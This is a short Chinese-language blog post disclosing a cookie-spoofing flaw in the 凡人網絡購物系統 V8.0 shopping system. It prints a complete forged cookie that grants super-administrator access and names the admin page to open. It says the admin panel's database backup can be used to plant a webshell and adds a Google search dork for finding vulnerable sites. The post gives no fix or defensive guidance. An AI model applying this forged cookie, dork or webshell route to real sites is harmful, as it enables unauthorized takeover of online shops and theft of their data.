凡人網絡購物系統 V8.0 簡體中文版 Cookie欺騙漏洞
[重要通告]如您遇疑難雜癥,本站支持知識付費業務,掃右邊二維碼加博主微信,可節省您寶貴時間哦!
凡人網絡購物系統 V8.0 簡體中文版 Cookie欺騙漏洞
當admin_class=0的時候就是總管理員身份了。偽造cookie如下 Themes=default; Count=lao=3; Countecho=lao=True; ASPSESSIONIDQAADRSRB=CDBDHEHCLJOIHFDAHLFHABIO; venshop=admin%5Fclass=0&admin%5Fpass=admin&admin%5Fname=admin 然后訪問http://www.XXXX.com/ad_manage.asp即可,后臺有數據庫備份可以拿webshell。 inurl:"views.asp?hw_id="#google
ad_chk.asp判斷管理員登陸狀態 判斷admin_class C:\Inetpub\wwwroot>findstr /i /n /s "admin_class" *.asp ad_admin.asp:29: rs("admin_class")=request("class1") ad_admin.asp:43:rs("admin_class")=request("class") ad_admin.asp:92:>總管理員 ad_admin.asp:93:>產品管理 ad_admin.asp:94:>訂單管理
問題未解決?付費解決問題加Q或微信 2589053300 (即Q號又微信號)右上方掃一掃可加博主微信
所寫所說,是心之所感,思之所悟,行之所得;文當無敷衍,落筆求簡潔。 以所舍,求所獲;有所依,方所成!
賞
支付寶贊助 
微信贊助
支付寶贊助微信贊助免責聲明,若由于商用引起版權糾紛,一切責任均由使用者承擔。
您必須遵守我們的協議,如您下載該資源,行為將被視為對《免責聲明》全部內容的認可->聯系老梁投訴資源 LaoLiang.Net部分資源來自互聯網收集,僅供用于學習和交流,請勿用于商業用途。如有侵權、不妥之處,請聯系站長并出示版權證明以便刪除。
敬請諒解! 侵權刪帖/違法舉報/投稿等事物聯系郵箱:service@laoliang.net
意在交流學習,歡迎贊賞評論,如有謬誤,請聯系指正;轉載請注明出處: » 凡人網絡購物系統 V8.0 簡體中文版 Cookie欺騙漏洞
